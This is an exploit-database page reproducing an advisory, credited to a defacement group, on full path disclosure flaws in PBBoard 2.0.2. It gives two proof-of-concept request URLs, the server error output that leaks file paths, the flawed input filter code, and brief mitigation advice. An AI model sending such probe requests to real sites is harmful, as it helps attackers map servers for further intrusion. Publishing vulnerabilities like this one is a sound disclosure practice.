header-logo
Suggest Exploit
vendor:
PBBoard
by:
rUnViRuS
N/A
CVSS
N/A
Full Path Disclosure
200
CWE
Product Name: PBBoard
Affected Version From: PBBoard 2.0.2
Affected Version To: PBBoard 2.0.2
Patch Exists: NO
Related CWE: N/A
CPE: a:pbboard:pbboard
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
Discovered in 2020

Advisory]PBBoard <=2.0.2 - Full Path Disclosure

Full Path Disclosure allows attackers to gather the real path of the server side script. Proof of concept: http://www.[xxxxx].com/path/index.php?page=new_topic&index=1&id=union and http://www.[xxxx].com/[path]/index.php?page=search&start=1&keyword=§ion=all&search=1

Mitigation:

Ensure that error messages do not disclose sensitive information, such as file paths, database names, usernames, passwords, or other sensitive information.
Source

Exploit-DB raw data:

Advisory]PBBoard <=2.0.2 - Full Path Disclosure
Details
=======
Product: PHP <= PBBoard
Security-Risk: moderated
Remote-Exploit: yes
Vendor-URL: http://www.pbboard.com

Credits
============
Discovered by: rUnViRuS
site: http://www.sec-area.com

Affected Products:
----------------------------
test on PBBoard 2.0.2
maybe work under 2.0.2

More Details
============
1. Full Path Disclosure
-----------------------------------
allow attackers to gather the real path of the server side script.

Proof of concept:
http://www.[xxxxx].com/path/index.php?page=new_topic&index=1&id=union

error
Fatal error: Call to undefined method PowerBBLocalCommon::error() in /home/xxx/public_html/vb/common.php on line 193

code :
// Check if $_GET don't value any SQL Injection
foreach ($PowerBB->_GET as $sql_get)
{
if ((eregi("select", $sql_get)) or
(eregi("union", $sql_get)) or
(eregi("%", $sql_get)))
{
$this->error('&#1592;?&#1592;?&#1591;&#1726; &#1591;¨&#1591;¹&#1592;?&#1592;?&#1592;&#1657;&#1592;? &#1591;&#1563;&#1592;&#1657;&#1591;± &#1592;?&#1591;´&#1591;±&#1592;?&#1591;¹&#1592;?!');
}
}
================
================
2. Full Path Disclosure
-----------------------------------
allow attackers to gather the real path of the server side script.

Proof of concept:
http://www.[xxxx].com/[path]/index.php?page=search&start=1&keyword=§ion=
all&search=1

Warning: filesize() [function.filesize]: stat failed for show_msg in /home/xxxxx/public_html/vb/includes/template.class.php on line 99

Fatal error: ERROR::FILE_SIZE_IS_ZERO in /home/xxxxx/public_html/vb/includes/template.class.php on line 146

--------------------------------------------------
[W]orld [D]efacers [T]eam
http://www.Sec-area.com

--------------------------------------------------